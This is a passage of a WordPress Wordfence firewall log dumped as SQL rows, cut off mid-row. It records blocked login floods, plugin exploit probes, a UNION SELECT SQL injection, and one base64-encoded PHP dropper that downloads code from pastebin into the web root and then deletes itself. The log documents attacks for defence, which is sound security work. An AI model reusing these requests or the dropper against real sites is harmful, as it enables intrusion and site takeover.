Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7872,1564599659.366455,1564599658.880200,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7873,1564599658.471218,1564599658.019500,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7874,1564599657.651052,1564599657.081100,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7875,1564599656.705653,1564599656.229200,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7876,1564599655.844101,1564599655.276500,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7877,1564599654.924052,1564599654.498100,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7878,1564599654.117704,1564599653.630600,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7879,1564599653.239614,1564599652.739400,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7880,0.000000,1564614238.310494,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7881,1564614314.156662,1564614313.761400,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7827,1564591933.212946,1564591932.344600,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7882,1564614313.084450,1564614312.619000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7828,1564591931.316016,1564591930.739200,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(7883,1564614311.964931,1564614311.488600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7884,1564614310.289023,1564614309.465400,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7829,1564591929.640844,1564591928.894500,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7885,1564614308.848160,1564614308.339100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7830,1564591927.698725,1564591925.476700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7886,1564614307.727150,1564614307.256500,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7887,1564614301.444653,1564614301.124900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7831,1564591922.415254,1564591921.400000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7888,1564614300.564570,1564614300.227700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7832,1564591920.416209,1564591919.519700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7889,1564614299.694087,1564614299.259300,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7890,1564614298.526886,1564614298.168100,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7833,1564591918.491642,1564591917.777000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=3',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mw==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7891,1564614297.528498,1564614297.163600,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7892,1564614296.603338,1564614296.224000,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7834,1564591916.936348,1564591916.196800,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=2',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"Mg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7893,1564614295.432763,1564614295.061800,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7835,1564591915.414178,1564591914.808700,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=1',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"MQ==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7894,1564614294.547283,1564614294.163900,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7895,1564614293.617668,1564614293.217200,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php','http://companyregistration.online/wp-login.php','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7836,1564591908.967106,1564591907.018000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-post.php?yp_remote_get=test',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Yellow Pencil Visual Theme Customizer <= 7.1.9 Arbitrary Options Update','{\"learningMode\":0,\"failedRules\":\"138\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t5cF9yZW1vdGVfZ2V0XQ==\",\"paramValue\":\"dGVzdA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLXBvc3QucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7896,1564614292.560179,1564614292.166700,'\0\0\0\0\0\0\0\0\0\0>)',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7837,1564591948.315148,1564591947.746200,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7839,0.000000,1564599650.916001,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php','','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsn','Blocked by Wordfence Security Network',NULL),(7840,1564599696.411613,1564599695.986300,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7841,1564599695.620733,1564599695.075700,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7838,1564591946.959641,1564591946.435000,'\0\0\0\0\0\0\0\0\0\0	8h',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','WP GDPR Compliance <= 1.4.2 - Update Any Option / Call Any Action','{\"learningMode\":0,\"failedRules\":\"120\",\"paramKey\":\"cmVxdWVzdC5ib2R5W2FjdGlvbl0=\",\"paramValue\":\"d3BnZHByY19wcm9jZXNzX2FjdGlvbg==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"privesc\",\"ssl\":1}'),(7842,1564599694.751519,1564599694.316700,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(7843,1564599693.967590,1564599693.583500,'\0\0\0\0\0\0\0\0\0\0A',0,503,0,0,0,'https://companyregistration.online/wp-login.php',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:wfsnrepeat','Blocked by Wordfence Security Network','{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),(8166,0.000000,1565036877.273482,'\0\0\0\0\0\0\0\0\0\0i',0,200,0,0,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginFailInvalidUsername',NULL,NULL),(8167,0.000000,1565036889.207250,'\0\0\0\0\0\0\0\0\0\0i',0,302,0,1,0,'https://companyregistration.online/wp-login.php','https://companyregistration.online/wp-login.php','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0','loginOK',NULL,NULL),(8070,1564682746.488557,1564682745.851500,'\0\0\0\0\0\0\0\0\0\0%z',0,403,0,0,0,'https://companyregistration.online/wp-admin/admin-ajax.php',NULL,'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36','blocked:waf','Newspaper Premium Theme <= 6.7.1 - Privilege Escalation','{\"learningMode\":0,\"failedRules\":\"91\",\"paramKey\":\"c2VydmVyLmVtcHR5\",\"paramValue\":\"\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8096,1564711847.622106,1564711847.210600,'\0\0\0\0\0\0\0\0\0\0{L',0,403,0,0,0,'https://companyregistration.online/?up_auto_log=true',NULL,'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0','blocked:waf','UserPro - User Profiles with Social Login <= 4.9.17 - Authentication Bypass','{\"learningMode\":0,\"failedRules\":\"106\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1t1cF9hdXRvX2xvZ10=\",\"paramValue\":\"dHJ1ZQ==\",\"path\":\"Lw==\",\"category\":\"auth-bypass\",\"ssl\":1}'),(8097,1564711990.368316,1564711989.628500,'\0\0\0\0\0\0\0\0\0\0{L',0,403,0,0,0,'https://companyregistration.online/wp-content/plugins/barclaycart/uploadify/uploadify.php',NULL,'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0','blocked:waf','SQL Injection','{\"learningMode\":0,\"failedRules\":\"3\",\"paramKey\":\"cmVxdWVzdC5ib2R5Wy0tMGU1YjM2OWE5NTc3OTljN2E0YzU3ZGJjMTk2OTRiZTINCkNvbnRlbnQtRGlzcG9zaXRpb246X2Zvcm0tZGF0YTtfbmFtZV0=\",\"paramValue\":\"IkZpbGVkYXRhIjsgZmlsZW5hbWU9ImZpbGVzL3NldHRpbmdzX2F1dG8ucGhwIg0KQ29udGVudC1UeXBlOiBtdWx0aXBhcnQvZm9ybS1kYXRhDQoNCjx0aXRsZT5WdWxuISEgcGF0Y2ggaXQgTm93ITwvdGl0bGU+DQo8P3BocA0KZnVuY3Rpb24gaHR0cF9nZXQoJHVybCl7DQoJJGltID0gY3VybF9pbml0KCR1cmwpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0NPTk5FQ1RUSU1FT1VULCAxMCk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0ZPTExPV0xPQ0FUSU9OLCAxKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfSEVBREVSLCAwKTsNCglyZXR1cm4gY3VybF9leGVjKCRpbSk7DQoJY3VybF9jbG9zZSgkaW0pOw0KfQ0KJGNoZWNrID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvd3AtY29udGVudC92dWxuLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3BoQU04REZIJyk7DQokb3BlbiA9IGZvcGVuKCRjaGVjaywgJ3cnKTsNCmZ3cml0ZSgkb3BlbiwgJHRleHQpOw0KZmNsb3NlKCRvcGVuKTsNCmlmKGZpbGVfZXhpc3RzKCRjaGVjaykpew0KICAgIGVjaG8gJGNoZWNrLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQokY2hlY2syID0gJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvdnVsbi5odG0iIDsNCiR0ZXh0MiA9IGh0dHBfZ2V0KCdodHRwczovL3Bhc3RlYmluLmNvbS9yYXcvODgwdWZhV0YnKTsNCiRvcGVuMiA9IGZvcGVuKCRjaGVjazIsICd3Jyk7DQpmd3JpdGUoJG9wZW4yLCAkdGV4dDIpOw0KZmNsb3NlKCRvcGVuMik7DQppZihmaWxlX2V4aXN0cygkY2hlY2syKSl7DQogICAgZWNobyAkY2hlY2syLiI8L2JyPiI7DQp9ZWxzZSANCiAgZWNobyAibm90IGV4aXRzIjsNCmVjaG8gImRvbmUgLlxuICIgOw0KDQpAdW5saW5rKF9fRklMRV9fKTsNCj8+DQoNCi0tMGU1YjM2OWE5NTc3OTljN2E0YzU3ZGJjMTk2OTRiZTItLQ0K\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9iYXJjbGF5Y2FydC91cGxvYWRpZnkvdXBsb2FkaWZ5LnBocA==\",\"category\":\"sqli\",\"ssl\":1}'),(8098,1564715991.126571,1564715990.737500,'\0\0\0\0\0\0\0\0\0\0%5',0,403,0,0,0,'https://companyregistration.online/wp-login.php?redirect_to=https%3A%2F%2Fcompanyregistration.online%2Fannual-returns%2F1111111111111%22+UNION+SELECT+CHAR%2845%2C120%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C49%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C50%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C51%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C52%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C53%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C54%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C55%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C56%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C49%2C57%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C48%2C45%2C81%2C45%29%2CCHAR%2845%2C120%2C50%2C49%2C45%2C81%2C45%29%2CCHA